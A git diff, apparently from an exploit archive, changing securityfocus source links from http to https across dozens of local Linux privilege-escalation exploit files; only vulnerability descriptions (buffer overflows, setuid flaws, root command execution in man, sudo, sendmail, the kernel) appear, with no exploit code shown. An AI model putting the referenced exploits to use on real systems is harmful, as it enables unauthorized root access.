a/exploits/linux/local/20493.sh +++ b/exploits/linux/local/20493.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2097/info +source: https://www.securityfocus.com/bid/2097/info A vulnerability exists in several versions of University of Washington's Pico, a widely-distributed text editor shipped with most versions of Linux / Unix. diff --git a/exploits/linux/local/20517.c b/exploits/linux/local/20517.c index e28708a31..405bfd070 100644 --- a/exploits/linux/local/20517.c +++ b/exploits/linux/local/20517.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2139/info +// source: https://www.securityfocus.com/bid/2139/info Itetris, or "Intelligent Tetris", is a clone of the popular Tetris puzzle game for linux systems. The svgalib version of Itetris is installed setuid root so that it may access video hardware when run by a regular user. Itetris contains a vulnerability which may allow unprivileged users to execute arbitrary commands as root. diff --git a/exploits/linux/local/20554.sh b/exploits/linux/local/20554.sh index 2a9931e7e..a1db10a5e 100755 --- a/exploits/linux/local/20554.sh +++ b/exploits/linux/local/20554.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2207/info +source: https://www.securityfocus.com/bid/2207/info rctab is the Run Control Tab script included with the SuSE distribution of the Linux Operating System. SuSE is a freely available, Open Source Operating system maintained by SuSE Incorporated. diff --git a/exploits/linux/local/20555.sh b/exploits/linux/local/20555.sh index 25c74f175..16ba3822a 100755 --- a/exploits/linux/local/20555.sh +++ b/exploits/linux/local/20555.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2207/info +source: https://www.securityfocus.com/bid/2207/info rctab is the Run Control Tab script included with the SuSE distribution of the Linux Operating System. SuSE is a freely available, Open Source Operating system maintained by SuSE Incorporated. diff --git a/exploits/linux/local/20556.c b/exploits/linux/local/20556.c index b0fe93c05..a925940bc 100644 --- a/exploits/linux/local/20556.c +++ b/exploits/linux/local/20556.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2210/info +// source: https://www.securityfocus.com/bid/2210/info splitvt is a VT100 window splitter, designed to allow the user two command line interfaces in one terminal window, originally written by Sam Lantinga. It is freely available, open source, and included with many variants of the Linux Operating System. diff --git a/exploits/linux/local/20581.c b/exploits/linux/local/20581.c index 9ad0bbec3..4f2c3bda0 100644 --- a/exploits/linux/local/20581.c +++ b/exploits/linux/local/20581.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2262/info +// source: https://www.securityfocus.com/bid/2262/info MySQL is a widely used Open Source database tool. Versions of MySQL up to and including 3.23.30 are vulnerable to a buffer overflow attack. diff --git a/exploits/linux/local/20604.sh b/exploits/linux/local/20604.sh index fad81df3e..2e4cdc4da 100755 --- a/exploits/linux/local/20604.sh +++ b/exploits/linux/local/20604.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2327/info +source: https://www.securityfocus.com/bid/2327/info man is the manual page viewing program, available with the Linux Operating System in this implementation. It is freely distributed and openly maintained. diff --git a/exploits/linux/local/20626.c b/exploits/linux/local/20626.c index 4ad3d7dd7..f3e517892 100644 --- a/exploits/linux/local/20626.c +++ b/exploits/linux/local/20626.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2364/info +source: https://www.securityfocus.com/bid/2364/info The Linux Kernel is the core of the Linux Operating System. It was originally written by Linus Torvalds, and is publicly maintained. diff --git a/exploits/linux/local/20645.c b/exploits/linux/local/20645.c index 9b74fd7de..fb4a48c48 100644 --- a/exploits/linux/local/20645.c +++ b/exploits/linux/local/20645.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2403/info +// source: https://www.securityfocus.com/bid/2403/info There is a buffer overflow in elm 2.5 PL3. This overflow is accessible by passing a long string to the -f (Alternative-Folder) command-line option. This vulnerability may not be restricted to this version of elm. diff --git a/exploits/linux/local/20691.txt b/exploits/linux/local/20691.txt index 942993a95..1466c9fa5 100644 --- a/exploits/linux/local/20691.txt +++ b/exploits/linux/local/20691.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2498/info +source: https://www.securityfocus.com/bid/2498/info FTPFS is a Linux kernel module allowing users to mount remote files from any standard FTP server as a local filesystem. diff --git a/exploits/linux/local/20720.c b/exploits/linux/local/20720.c index aab2e8745..9e91e2fd8 100644 --- a/exploits/linux/local/20720.c +++ b/exploits/linux/local/20720.c @@ -1,7 +1,7 @@ /* EDB Note: Updated exploit can be found here: https://www.exploit-db.com/exploits/20721/ -source: http://www.securityfocus.com/bid/2529/info +source: https://www.securityfocus.com/bid/2529/info The Linux kernel is the core of all distributions of the Linux Operating System. It was originally written by Linus Torvalds, and is maintained by a community of developers. diff --git a/exploits/linux/local/20721.c b/exploits/linux/local/20721.c index 4f39c3999..0a5321a31 100644 --- a/exploits/linux/local/20721.c +++ b/exploits/linux/local/20721.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2529/info +source: https://www.securityfocus.com/bid/2529/info The Linux kernel is the core of all distributions of the Linux Operating System. It was originally written by Linus Torvalds, and is maintained by a community of developers. diff --git a/exploits/linux/local/20776.c b/exploits/linux/local/20776.c index 16fc7bd32..b568dcccb 100644 --- a/exploits/linux/local/20776.c +++ b/exploits/linux/local/20776.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2617/info +// source: https://www.securityfocus.com/bid/2617/info Samba is a flexible file sharing packaged maintained by the Samba development group. It provides interoperatability between UNIX and Microsoft Windows systems, permitting the sharing of files and printing services. diff --git a/exploits/linux/local/20777.c b/exploits/linux/local/20777.c index 6d68461f9..7d8e36f70 100644 --- a/exploits/linux/local/20777.c +++ b/exploits/linux/local/20777.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2620/info +// source: https://www.securityfocus.com/bid/2620/info The innfeed utility, part of ISC InterNetNews, has an exploitable buffer overflow in its command-line parser. Specifically, innfeed will overflow if an overly long -c option is passed to it. diff --git a/exploits/linux/local/20778.sh b/exploits/linux/local/20778.sh index f92d378bf..f66724382 100755 --- a/exploits/linux/local/20778.sh +++ b/exploits/linux/local/20778.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2620/info +source: https://www.securityfocus.com/bid/2620/info The innfeed utility, part of ISC InterNetNews, has an exploitable buffer overflow in its command-line parser. Specifically, innfeed will overflow if an overly long -c option is passed to it. diff --git a/exploits/linux/local/20781.txt b/exploits/linux/local/20781.txt index f288587e3..0aedc746b 100644 --- a/exploits/linux/local/20781.txt +++ b/exploits/linux/local/20781.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2629/info +source: https://www.securityfocus.com/bid/2629/info KFM is the KDE File Manager, included with version 1 of the KDE base package in most Linux installations. KFM is designed as a graphical, easily navigated interface to the Linux Filesystem. diff --git a/exploits/linux/local/20795.sh b/exploits/linux/local/20795.sh index 9d6c1c486..bf72d7d8a 100755 --- a/exploits/linux/local/20795.sh +++ b/exploits/linux/local/20795.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2645/info +source: https://www.securityfocus.com/bid/2645/info Sendfile is an implementation of the SAFT (simple asynchronous file transfer) protocol for UNIX systems. @@ -9,7 +9,7 @@ Due to a problem dropping privileges completely before running user-specified po # sfdfwd - Sendfile daemon local arbitrary command execution vulnerability # # references: -# http://www.securityfocus.com/bid/2645 +# https://www.securityfocus.com/bid/2645 # http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=76048 # # 04/24/01 psheep diff --git a/exploits/linux/local/20798.sh b/exploits/linux/local/20798.sh index 83b494cf7..c2ea1a530 100755 --- a/exploits/linux/local/20798.sh +++ b/exploits/linux/local/20798.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2652/info +source: https://www.securityfocus.com/bid/2652/info Sendfile is an implementation of the SAFT (simple asynchronous file transfer) protocol for UNIX systems. @@ -9,8 +9,8 @@ A serialization error exists in the Sendfile daemon, sendfiled. When used in con # sfdnfy - Sendfile daemon local arbitrary command execution vulnerability # # references: -# http://www.securityfocus.com/bid/2652 -# http://www.securityfocus.com/bid/2631 +# https://www.securityfocus.com/bid/2652 +# https://www.securityfocus.com/bid/2631 # # 04/24/01 psheep diff --git a/exploits/linux/local/20822.sh b/exploits/linux/local/20822.sh index 86a06d5f0..d21f80150 100755 --- a/exploits/linux/local/20822.sh +++ b/exploits/linux/local/20822.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2687/info +source: https://www.securityfocus.com/bid/2687/info Vixie cron is an implementation of the popular UNIX program that runs user-specified programs at periodic scheduled times. diff --git a/exploits/linux/local/20823.sh b/exploits/linux/local/20823.sh index 5a5a0ba4c..ee899161b 100755 --- a/exploits/linux/local/20823.sh +++ b/exploits/linux/local/20823.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2687/info +source: https://www.securityfocus.com/bid/2687/info Vixie cron is an implementation of the popular UNIX program that runs user-specified programs at periodic scheduled times. @@ -32,7 +32,7 @@ This vulnerability may be exploited to gain root privileges locally. # to also be vulnerable. # # references: -# http://www.securityfocus.com/bid/2687 +# https://www.securityfocus.com/bid/2687 # # 05/07/01 cairnsc@securityfocus.com diff --git a/exploits/linux/local/20843.txt b/exploits/linux/local/20843.txt index da18d2d3c..6f931503c 100644 --- a/exploits/linux/local/20843.txt +++ b/exploits/linux/local/20843.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2711/info +source: https://www.securityfocus.com/bid/2711/info A heap overflow vulnerability exists in the 'man' system manual pager program. diff --git a/exploits/linux/local/20867.txt b/exploits/linux/local/20867.txt index 167f62c59..65a8ddc66 100644 --- a/exploits/linux/local/20867.txt +++ b/exploits/linux/local/20867.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2741/info +source: https://www.securityfocus.com/bid/2741/info ARCservIT from Computer Associates contains a vulnerability which may allow malicious local users to overwrite arbitrary files. diff --git a/exploits/linux/local/20868.txt b/exploits/linux/local/20868.txt index 4a3505895..e35ae56ae 100644 --- a/exploits/linux/local/20868.txt +++ b/exploits/linux/local/20868.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2748/info +source: https://www.securityfocus.com/bid/2748/info ARCservIT from Computer Associates contains a vulnerability which may allow malicious local users to corrupt arbitrary files. diff --git a/exploits/linux/local/20897.sh b/exploits/linux/local/20897.sh index 2479116d0..172f34af9 100755 --- a/exploits/linux/local/20897.sh +++ b/exploits/linux/local/20897.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2815/info +source: https://www.securityfocus.com/bid/2815/info A vulnerability exists in the 'man' system manual pager program. diff --git a/exploits/linux/local/20898.sh b/exploits/linux/local/20898.sh index 2b70596cf..34498f33a 100755 --- a/exploits/linux/local/20898.sh +++ b/exploits/linux/local/20898.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2815/info +source: https://www.securityfocus.com/bid/2815/info A vulnerability exists in the 'man' system manual pager program. diff --git a/exploits/linux/local/20900.txt b/exploits/linux/local/20900.txt index d508ddddf..85538a175 100644 --- a/exploits/linux/local/20900.txt +++ b/exploits/linux/local/20900.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2828/info +source: https://www.securityfocus.com/bid/2828/info Exim is a free, open-source Mail Transfer Agent for Unix systems. diff --git a/exploits/linux/local/20901.c b/exploits/linux/local/20901.c index 31bcbc562..11a9075f5 100644 --- a/exploits/linux/local/20901.c +++ b/exploits/linux/local/20901.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2829/info +// source: https://www.securityfocus.com/bid/2829/info Sudo (superuser do) is a security utility that allows administrator to give 'restricted' superuser privileges to certain users. diff --git a/exploits/linux/local/20926.txt b/exploits/linux/local/20926.txt index 393fce5a9..adc3ab341 100644 --- a/exploits/linux/local/20926.txt +++ b/exploits/linux/local/20926.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2872/info +source: https://www.securityfocus.com/bid/2872/info A buffer overflow vulnerability exists in the implementation of the 'man' system manual pager program commonly included with Linux distributions. diff --git a/exploits/linux/local/20927.c b/exploits/linux/local/20927.c index ea58cf13f..ba1b4e0b7 100644 --- a/exploits/linux/local/20927.c +++ b/exploits/linux/local/20927.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2875/info +// source: https://www.securityfocus.com/bid/2875/info BestCrypt is a commercial file system encryption software package distributed by Jetico. BestCrypt offers compatibility on the Windows and Linux platforms, using open development standards to offer a secure product. diff --git a/exploits/linux/local/20928.sh b/exploits/linux/local/20928.sh index 406ef0f74..77bafb585 100755 --- a/exploits/linux/local/20928.sh +++ b/exploits/linux/local/20928.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2878/info +source: https://www.securityfocus.com/bid/2878/info Rxvt is a color VT102 terminal emulator for X intended as an xterm(1) replacement. diff --git a/exploits/linux/local/20967.c b/exploits/linux/local/20967.c index 447a0c2bb..6b67fa32b 100644 --- a/exploits/linux/local/20967.c +++ b/exploits/linux/local/20967.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2927/info +source: https://www.securityfocus.com/bid/2927/info Vim is an enhanced version of the popular text editor vi. diff --git a/exploits/linux/local/20979.c b/exploits/linux/local/20979.c index ff015a523..6c1e8b866 100644 --- a/exploits/linux/local/20979.c +++ b/exploits/linux/local/20979.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2937/info +source: https://www.securityfocus.com/bid/2937/info The Linux /proc filesystem is a virtual filesystem provided by the Linux Kernel as an interface to some process and system information and parameters. diff --git a/exploits/linux/local/20986.c b/exploits/linux/local/20986.c index 5a0538d8a..5e1bb7e72 100644 --- a/exploits/linux/local/20986.c +++ b/exploits/linux/local/20986.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2955/info +// source: https://www.securityfocus.com/bid/2955/info Xvt is a terminal emulator for systems using X11R6. It is often installed setuid/setgid so that it runs with the enhanced privileges required to log user sessions. diff --git a/exploits/linux/local/20988.c b/exploits/linux/local/20988.c index 21c1817ff..4e78d93d8 100644 --- a/exploits/linux/local/20988.c +++ b/exploits/linux/local/20988.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2958/info +source: https://www.securityfocus.com/bid/2958/info CylantSecure is a commercial Linux hardening tool and security infrastructure available from Cylant Technology. diff --git a/exploits/linux/local/20990.c b/exploits/linux/local/20990.c index 4863b9076..007840f18 100644 --- a/exploits/linux/local/20990.c +++ b/exploits/linux/local/20990.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2974/info +source: https://www.securityfocus.com/bid/2974/info teTeX is a TeX distribution for UNIX compatible systems. diff --git a/exploits/linux/local/20992.c b/exploits/linux/local/20992.c index 95c0a9950..db4feb72c 100644 --- a/exploits/linux/local/20992.c +++ b/exploits/linux/local/20992.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2984/info +// source: https://www.securityfocus.com/bid/2984/info Jon Zeeff's lmail is a local mail delivery agent (LDA) designed to provide mail-to-pipe and mail-to-file aliasing for smail. diff --git a/exploits/linux/local/21010.sh b/exploits/linux/local/21010.sh index 6ce69f3c5..f72acea3c 100755 --- a/exploits/linux/local/21010.sh +++ b/exploits/linux/local/21010.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3030/info +source: https://www.securityfocus.com/bid/3030/info xman is a component included with the XFree86 Window System. diff --git a/exploits/linux/local/21014.c b/exploits/linux/local/21014.c index 81dc3a703..35320588c 100644 --- a/exploits/linux/local/21014.c +++ b/exploits/linux/local/21014.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3054/info +// source: https://www.securityfocus.com/bid/3054/info Slackware Linux contains a configuration error that enables local users to create files in the directory used by the system manual pager ('man') for cache files. diff --git a/exploits/linux/local/21043.c b/exploits/linux/local/21043.c index 4e7e583d9..939c56bb5 100644 --- a/exploits/linux/local/21043.c +++ b/exploits/linux/local/21043.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3127/info +// source: https://www.securityfocus.com/bid/3127/info GNU locate is an application that searches file databases for file names that match user-supplied patterns. diff --git a/exploits/linux/local/21060.c b/exploits/linux/local/21060.c index 881ffacdc..d709e4e97 100644 --- a/exploits/linux/local/21060.c +++ b/exploits/linux/local/21060.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3163/info +// source: https://www.securityfocus.com/bid/3163/info An input validation error exists in Sendmail's debugging functionality. diff --git a/exploits/linux/local/21061.c b/exploits/linux/local/21061.c index b42f781f8..b274a1cd0 100644 --- a/exploits/linux/local/21061.c +++ b/exploits/linux/local/21061.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3163/info +// source: https://www.securityfocus.com/bid/3163/info An input validation error exists in Sendmail's debugging functionality. diff --git a/exploits/linux/local/21062.txt b/exploits/linux/local/21062.txt index 2e76eb1b7..2f4d7cc4c 100644 --- a/exploits/linux/local/21062.txt +++ b/exploits/linux/local/21062.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3163/info +source: https://www.securityfocus.com/bid/3163/info An input validation error exists in Sendmail's debugging functionality. diff --git a/exploits/linux/local/21063.txt b/exploits/linux/local/21063.txt index c5fc9e667..aeb677b71 100644 --- a/exploits/linux/local/21063.txt +++ b/exploits/linux/local/21063.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3163/info +source: https://www.securityfocus.com/bid/3163/info An input validation error exists in Sendmail's debugging functionality. diff --git a/exploits/linux/local/21124.txt b/exploits/linux/local/21124.txt index 18cac4047..d630d705a 100644 --- a/exploits/linux/local/21124.txt +++ b/exploits/linux/local/21124.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3447/info +source: https://www.securityfocus.com/bid/3447/info Linux contains a vulnerability in it's exec() implementation that may allow for modification of setuid process memory via ptrace(). The vulnerability is due to the fact that it is possible for a traced process to exec() a setuid image if the tracing process is setuid. diff --git a/exploits/linux/local/21158.c b/exploits/linux/local/21158.c index 8cd7b361f..0f9abd643 100644 --- a/exploits/linux/local/21158.c +++ b/exploits/linux/local/21158.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3572/info +// source: https://www.securityfocus.com/bid/3572/info Parallel Make (pmake) is a freely available version of the make program, originally distributed with Berkeley Unix. It is designed to execute Makefiles and build programs. diff --git a/exploits/linux/local/21159.c b/exploits/linux/local/21159.c index 8f24682a0..14ddca483 100644 --- a/exploits/linux/local/21159.c +++ b/exploits/linux/local/21159.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3573/info +// source: https://www.securityfocus.com/bid/3573/info Parallel Make (pmake) is a freely available version of the make program, originally distributed with Berkeley Unix. It is designed to execute Makefiles and build programs. diff --git a/exploits/linux/local/21216.sh b/exploits/linux/local/21216.sh index 8fa4a5ba7..f697dbe8d 100755 --- a/exploits/linux/local/21216.sh +++ b/exploits/linux/local/21216.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3865/info +source: https://www.securityfocus.com/bid/3865/info CDRDAO is a freely available, open source CD recording software package available for the Unix and Linux Operating Systems. It is maintained by Andreas Mueller. diff --git a/exploits/linux/local/21217.sh b/exploits/linux/local/21217.sh index 0e915e168..33cb6465a 100755 --- a/exploits/linux/local/21217.sh +++ b/exploits/linux/local/21217.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3865/info +source: https://www.securityfocus.com/bid/3865/info CDRDAO is a freely available, open source CD recording software package available for the Unix and Linux Operating Systems. It is maintained by Andreas Mueller. diff --git a/exploits/linux/local/21218.sh b/exploits/linux/local/21218.sh index 8523e934d..3af2b69f0 100755 --- a/exploits/linux/local/21218.sh +++ b/exploits/linux/local/21218.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3865/info +source: https://www.securityfocus.com/bid/3865/info CDRDAO is a freely available, open source CD recording software package available for the Unix and Linux Operating Systems. It is maintained by Andreas Mueller. diff --git a/exploits/linux/local/21219.sh b/exploits/linux/local/21219.sh index 5ceea59bc..4ed671060 100755 --- a/exploits/linux/local/21219.sh +++ b/exploits/linux/local/21219.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3865/info +source: https://www.securityfocus.com/bid/3865/info CDRDAO is a freely available, open source CD recording software package available for the Unix and Linux Operating Systems. It is maintained by Andreas Mueller. diff --git a/exploits/linux/local/21226.c b/exploits/linux/local/21226.c index 69420d119..bc2840ef4 100644 --- a/exploits/linux/local/21226.c +++ b/exploits/linux/local/21226.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3868/info +// source: https://www.securityfocus.com/bid/3868/info Imlib2 is a freely available, open source graphics library available for the Linux and Unix operating systems. It is maintained by Michael Jennings. diff --git a/exploits/linux/local/21227.sh b/exploits/linux/local/21227.sh index 863d89301..202c836db 100755 --- a/exploits/linux/local/21227.sh +++ b/exploits/linux/local/21227.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3871/info +source: https://www.securityfocus.com/bid/3871/info Sudo is a freely available, open source permissions management software package available for the Linux and Unix operating systems. It is maintained by Todd C. Miller. diff --git a/exploits/linux/local/21229.txt b/exploits/linux/local/21229.txt index 7997a24e2..d07eb11cd 100644 --- a/exploits/linux/local/21229.txt +++ b/exploits/linux/local/21229.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3886/info +source: https://www.securityfocus.com/bid/3886/info at is a freely available, open source scheduler package. It is included with various Unix and Linux operating systems, and maintained by public domain. diff --git a/exploits/linux/local/21231.c b/exploits/linux/local/21231.c index 887ecc4fc..135ab41b3 100644 --- a/exploits/linux/local/21231.c +++ b/exploits/linux/local/21231.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3896/info +// source: https://www.securityfocus.com/bid/3896/info Chinput is an input server designed for Chinese characters. It is available on Linux and other Unix based systems. Chinput appears to be installed suid root by default. diff --git a/exploits/linux/local/21247.c b/exploits/linux/local/21247.c index cf701aaf1..4075ef5b1 100644 --- a/exploits/linux/local/21247.c +++ b/exploits/linux/local/21247.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3970/info +// source: https://www.securityfocus.com/bid/3970/info BRU is a commercially available backup software infrastructure available for both UNIX and Linux Operating Systems. It is distributed and maintained by the Tolis Group. diff --git a/exploits/linux/local/21248.txt b/exploits/linux/local/21248.txt index 2d4d93ef0..2106e0228 100644 --- a/exploits/linux/local/21248.txt +++ b/exploits/linux/local/21248.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3973/info +source: https://www.securityfocus.com/bid/3973/info User-Mode Linux (UML) is a patch which allows the Linux Kernel to run as a user space process. It is currently available for the Linux operating system. It may be used as an efficient tool for kernel development, as well as for virtual networking, honeypots, and experimentation. diff --git a/exploits/linux/local/21258.bat b/exploits/linux/local/21258.bat index 7dae459c0..d57a523ce 100644 --- a/exploits/linux/local/21258.bat +++ b/exploits/linux/local/21258.bat @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3989/info +source: https://www.securityfocus.com/bid/3989/info There exists a condition in Microsoft Windows operating systems using NTFS that may allow for files to be hidden. diff --git a/exploits/linux/local/21259.java b/exploits/linux/local/21259.java index ff614b61c..e1a18b48a 100644 --- a/exploits/linux/local/21259.java +++ b/exploits/linux/local/21259.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3992/info +source: https://www.securityfocus.com/bid/3992/info Java programs run in an intepreted environment, the Java Virtual Machine (JVM). Sun has provided a reference JVM implementation for multiple platforms, including Solaris, Windows and Linux. diff --git a/exploits/linux/local/21280.c b/exploits/linux/local/21280.c index 660740d9d..9c3c09b2d 100644 --- a/exploits/linux/local/21280.c +++ b/exploits/linux/local/21280.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4050/info +// source: https://www.securityfocus.com/bid/4050/info Hanterm is a replacement for xterm which includes Hangul support, used for Korean language systems. diff --git a/exploits/linux/local/21281.c b/exploits/linux/local/21281.c index f2bc0e8d6..54be9b47a 100644 --- a/exploits/linux/local/21281.c +++ b/exploits/linux/local/21281.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4050/info +// source: https://www.securityfocus.com/bid/4050/info Hanterm is a replacement for xterm which includes Hangul support, used for Korean language systems. diff --git a/exploits/linux/local/21302.c b/exploits/linux/local/21302.c index f63e6ef89..d4c871369 100644 --- a/exploits/linux/local/21302.c +++ b/exploits/linux/local/21302.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4174/info +// source: https://www.securityfocus.com/bid/4174/info Term is a commercially available software package for Unix and Linux operating systems. It is distributed and maintained by Century Software. diff --git a/exploits/linux/local/21341.c b/exploits/linux/local/21341.c index 462526c2c..85e2e0ca1 100644 --- a/exploits/linux/local/21341.c +++ b/exploits/linux/local/21341.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4271/info +// source: https://www.securityfocus.com/bid/4271/info Ecartis is the new name for the Listar software product. Listar is a mailing list management package for Linux, BSD, and other Unix like operating systems. diff --git a/exploits/linux/local/21342.c b/exploits/linux/local/21342.c index 039a7a980..c3c255378 100644 --- a/exploits/linux/local/21342.c +++ b/exploits/linux/local/21342.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4271/info +// source: https://www.securityfocus.com/bid/4271/info Ecartis is the new name for the Listar software product. Listar is a mailing list management package for Linux, BSD, and other Unix like operating systems. diff --git a/exploits/linux/local/21348.txt b/exploits/linux/local/21348.txt index 88d8e9b57..efb93e5b2 100644 --- a/exploits/linux/local/21348.txt +++ b/exploits/linux/local/21348.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4329/info +source: https://www.securityfocus.com/bid/4329/info Webmin is a web-based interface for system administration of Unix and Linux operating systems. diff --git a/exploits/linux/local/21353.c b/exploits/linux/local/21353.c index 67392afbc..26d9200e8 100644 --- a/exploits/linux/local/21353.c +++ b/exploits/linux/local/21353.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/4367/info +source: https://www.securityfocus.com/bid/4367/info The Linux kernel d_path() function converts a dentry structure into an ASCII path name. The full path to the specified dentry is returned in a fixed length buffer of size PAGE_SIZE bytes. diff --git a/exploits/linux/local/21356.sh b/exploits/linux/local/21356.sh index 6a0df44ec..ac43635c1 100755 --- a/exploits/linux/local/21356.sh +++ b/exploits/linux/local/21356.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4374/info +source: https://www.securityfocus.com/bid/4374/info LogWatch is a freely available, open source script for monitoring log files. It may be used with the Linux and Unix Operating systems. diff --git a/exploits/linux/local/21362.c b/exploits/linux/local/21362.c index a7e58c9d6..4a3626a8b 100644 --- a/exploits/linux/local/21362.c +++ b/exploits/linux/local/21362.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/4413/info +source: https://www.securityfocus.com/bid/4413/info Oracle 8i is a powerful relational database product. It is available for Windows, Linux, and a wide range of Unix operating systems. diff --git a/exploits/linux/local/21375.txt b/exploits/linux/local/21375.txt index 559ae3a62..7b28c9bc5 100644 --- a/exploits/linux/local/21375.txt +++ b/exploits/linux/local/21375.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4501/info +source: https://www.securityfocus.com/bid/4501/info The Internet Software Consortium (ISC) Internet News (INN) project is a powerful, mature implementation of a usenet system, including a NNTP server and a newsreading server. It is available for a wide range of Unix based systems, including Linux. diff --git a/exploits/linux/local/21398.txt b/exploits/linux/local/21398.txt index 3583760db..58cc74e5d 100644 --- a/exploits/linux/local/21398.txt +++ b/exploits/linux/local/21398.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4547/info +source: https://www.securityfocus.com/bid/4547/info SSH (and derivatives) is the protocol Secure Shell protocol implementation. It is available for various operating systems, although this vulnerability affects operating systems such as Unix and Linux. diff --git a/exploits/linux/local/21420.c b/exploits/linux/local/21420.c index dbc7dcae1..2a47a6108 100644 --- a/exploits/linux/local/21420.c +++ b/exploits/linux/local/21420.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4593/info +// source: https://www.securityfocus.com/bid/4593/info Sudo is a widely used Linux/Unix utility allow users to securely run commands as other users. diff --git a/exploits/linux/local/21458.txt b/exploits/linux/local/21458.txt index ae3a30157..610e2beea 100644 --- a/exploits/linux/local/21458.txt +++ b/exploits/linux/local/21458.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4762/info +source: https://www.securityfocus.com/bid/4762/info An attacker with root access may be able to write to kernel memory in spite of the security patch provided by grsecurity. The patch operates by redirecting the write() system call, when it is being used to write to a memory device. Unfortunately, there are other methods that can be used to write to kernel memory (such as mapping the device to memory using mmap()). diff --git a/exploits/linux/local/21496.c b/exploits/linux/local/21496.c index f0337c8e0..032c2a4ca 100644 --- a/exploits/linux/local/21496.c +++ b/exploits/linux/local/21496.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4891/info +// source: https://www.securityfocus.com/bid/4891/info Informix is an enterprise database distributed and maintained by IBM. diff --git a/exploits/linux/local/21497.pl b/exploits/linux/local/21497.pl index 35a1abfb7..350874a90 100755 --- a/exploits/linux/local/21497.pl +++ b/exploits/linux/local/21497.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4891/info +source: https://www.securityfocus.com/bid/4891/info Informix is an enterprise database distributed and maintained by IBM. diff --git a/exploits/linux/local/21499.txt b/exploits/linux/local/21499.txt index af6e60fde..a0cad0d29 100644 --- a/exploits/linux/local/21499.txt +++ b/exploits/linux/local/21499.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4901/info +source: 